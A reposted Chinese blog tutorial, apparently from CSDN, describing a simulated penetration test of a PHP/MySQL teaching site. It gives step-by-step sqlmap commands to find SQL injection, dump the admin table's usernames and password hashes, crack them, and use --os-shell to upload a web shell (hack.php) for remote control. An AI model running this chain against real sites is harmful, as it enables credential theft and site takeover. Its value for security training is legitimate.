0


渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

环境:对某网站进行渗透测试。

(PHP+Mysql开发的网站,用于WEB漏洞教学和检测的)

工具:sqlmap(Kali Linux中自带or官网下载Windows版)

此次实验所涉及的sqlmap参数:


一、信息收集

二、漏洞挖掘

(1)判断网站是否存在sql注入漏洞

使用工具,sqlmap:sqlmap -u "目标网站地址" --batch

(2)存在 sql注入漏洞,

使用sqlmap进行sql注入,并获取后台管理员的账号和密码。

1、先跑出当前网站所使用的数据库库名

(sqlmap -u "http://*********/product.php?cid=4" --current-db)

当前数据库:’510cms‘。

2、求当前数据库下所有表名

(sqlmap -u "http://*************/product.php?cid=4" -D 510cms --tables)

3、求指定表内列名

(sqlmap -u "http://***********/product.php?cid=4" -D 510cms -T 510_admin --columns)

4、求指定列名的字段

(sqlmap -u "http://*********/product.php?cid=4" -D 510cms -T 510_admin -C name,passwd --dump)

三、获取账户密码后就可以登录网站后台()

(1)使用md5在线解密破解密码

获取弱口令

(2)找到后台地址就可以登录了

(3)如何获取网站后台地址(参考之前的一篇)

(223条消息) 渗透测试中的信息收集(使用相关工具,收集网站的子域名,扫描网站的后台地址)_net1996的博客-CSDN博客

四、攻击网站,利用sqlmap上传大马,可以对网站进行后台操作

(1)

(sqlmap -u "http://************/product.php?cid=4" --os-shell)

四个选项:

(2)进入如上网站,上传自己准备的大马(hack.php)

(3)上传成功后,在网站原址后加上/hack.php即可进入操作界面

(http://***********/hack.php)密码在大马文件中有。

标签: sql 安全 web安全

本文转载自: https://blog.csdn.net/m0_57028135/article/details/128744001
版权归原作者 net1996 所有, 如有侵权,请联系我们删除。

“渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)”的评论:

还没有评论